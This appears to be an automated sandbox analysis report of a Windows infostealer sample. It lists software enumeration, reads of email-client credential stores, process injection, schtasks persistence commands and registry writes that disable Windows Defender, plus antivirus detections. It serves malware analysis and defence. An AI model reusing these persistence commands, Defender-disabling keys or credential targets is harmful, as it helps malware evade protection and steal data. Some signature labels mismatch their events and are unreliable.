RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:50 a.m.	key_handle: 0x00000598 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (3 events)

process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
process	explorhe.exe	useragent
process	InstallSetup7.exe	useragent	NSIS_Inetc (Mozilla)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1896 called NtSetContextThread to modify thread in remote process 840
Process injection	Process 2872 called NtSetContextThread to modify thread in remote process 3064
NtSetContextThread Jan. 5, 2024, 7:50 a.m.	registers.eip: 2005598660 registers.esp: 3865296 registers.edi: 0 registers.eax: 4391054 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000264 process_identifier: 840	1	0	0
NtSetContextThread Jan. 5, 2024, 7:50 a.m.	registers.eip: 2005598660 registers.esp: 1702152 registers.edi: 0 registers.eax: 4306976 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000318 process_identifier: 3064	1	0	0

Appends a known CryptoMix ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2140 resumed a thread in remote process 2232
Process injection	Process 1896 resumed a thread in remote process 840
Process injection	Process 2872 resumed a thread in remote process 3064
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000390 suspend_count: 1 process_identifier: 2232	1	0	0
NtResumeThread Jan. 5, 2024, 7:50 a.m.	thread_handle: 0x00000264 suspend_count: 1 process_identifier: 840	1	0	0
NtResumeThread Jan. 5, 2024, 7:50 a.m.	thread_handle: 0x00000318 suspend_count: 1 process_identifier: 3064	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
cmdline	"cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
cmdline	"cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST

Disables Windows Security features (8 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 188 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 292 thread_handle: 0x0000001c process_identifier: 940 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\Cm0Fo98.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Jan. 5, 2024, 7:50 a.m.	thread_identifier: 1552 thread_handle: 0x00000128 process_identifier: 1044 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7pB3Mq40.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2080 thread_handle: 0x0000001c process_identifier: 2076 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1SS26ZD8.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2352 thread_handle: 0x00000128 process_identifier: 2348 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2Fy3903.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2144 thread_handle: 0x00000200 process_identifier: 2140 current_directory: C:\Users\test22\AppData\Local\Temp\IXP001.TMP filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001fc	1	1
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2236 thread_handle: 0x00000390 process_identifier: 2232 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2140 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000394	1	1
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000390 suspend_count: 1 process_identifier: 2232	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000474 suspend_count: 1 process_identifier: 2140	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2140	1	0
NtGetContextThread Jan. 5, 2024, 7:50 a.m.	thread_handle: 0x00000794	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000258 suspend_count: 1 process_identifier: 2232	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x0000028c suspend_count: 1 process_identifier: 2232	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 2232	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000007c4 suspend_count: 1 process_identifier: 2232	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000200 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2348	1	0
NtGetContextThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000204	1	0
NtGetContextThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000204	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 2348	1	0
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2508 thread_handle: 0x0000032c process_identifier: 2504 current_directory: C:\Users\test22\AppData\Local\Temp\IXP001.TMP filepath: track: 1 command_line: "powershell" Get-MpPreference -verbose filepath_r: stack_pivoted: 0 creation_flags: 134742016 (CREATE_NO_WINDOW\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000338	1	1
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2784 thread_handle: 0x0000045c process_identifier: 2780 current_directory: C:\Users\test22\AppData\Local\Temp\IXP001.TMP filepath: track: 1 command_line: "cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000454	1	1
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2880 thread_handle: 0x00000454 process_identifier: 2876 current_directory: C:\Users\test22\AppData\Local\Temp\IXP001.TMP filepath: track: 1 command_line: "cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000464	1	1
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000460 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000004b0 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000004cc suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000004e4 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000634 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000848 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000880 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000894 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000900 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000914 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000928 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000940 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000958 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x0000096c suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000980 suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:50 a.m.	thread_handle: 0x000004cc suspend_count: 1 process_identifier: 2348	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2504	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000344 suspend_count: 1 process_identifier: 2504	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 2504	1	0
NtResumeThread Jan. 5, 2024, 7:49 a.m.	thread_handle: 0x000004f4 suspend_count: 1 process_identifier: 2504	1	0
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2832 thread_handle: 0x00000138 process_identifier: 2828 current_directory: C:\Users\test22\AppData\Local\Temp\IXP001.TMP filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000013c	1	1
CreateProcessInternalW Jan. 5, 2024, 7:49 a.m.	thread_identifier: 2924 thread_handle: 0x00000138 process_identifier: 2920 current_directory: C:\Users\test22\AppData\Local\Temp\IXP001.TMP filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000013c	1	1
CreateProcessInternalW Jan. 5, 2024, 7:50 a.m.	thread_identifier: 2456 thread_handle: 0x0000035c process_identifier: 3040 current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000364	1	1
NtResumeThread Jan. 5, 2024, 7:50 a.m.	thread_handle: 0x0000027c suspend_count: 1 process_identifier: 3040	1	0

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Heur.Crifi.1
Skyhigh	BehavesLike.Win32.Generic.vc
McAfee	Artemis!9A0B7EE71361
Malwarebytes	MachineLearning/Anomalous.96%
K7AntiVirus	Trojan ( 005aad751 )
K7GW	Trojan ( 005aad751 )
CrowdStrike	win/malicious_confidence_90% (D)
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	multiple detections
APEX	Malicious
Kaspersky	UDS:Trojan-PSW.Win32.RisePro
BitDefender	Gen:Heur.Crifi.1
Avast	Win32:TrojanX-gen [Trj]
Sophos	Generic ML PUA (PUA)
F-Secure	Heuristic.HEUR/AGEN.1306479
VIPRE	Gen:Heur.Crifi.1
Emsisoft	Gen:Heur.Crifi.1 (B)
SentinelOne	Static AI - Malicious SFX
MAX	malware (ai score=89)
Jiangmin	Trojan.Script.awbz
Google	Detected
Avira	HEUR/AGEN.1306479
Varist	W32/Kryptik.JKR.gen!Eldorado
Microsoft	TrojanDownloader:Win32/Amadey.PPM!MTB
Gridinsoft	Spy.Win32.Redline.lu!heur
Arcabit	Trojan.Crifi.1
ZoneAlarm	UDS:Trojan-PSW.Win32.RisePro
GData	Gen:Heur.Crifi.1
Cynet	Malicious (score: 99)
Zoner	Probably Heur.ExeHeaderL
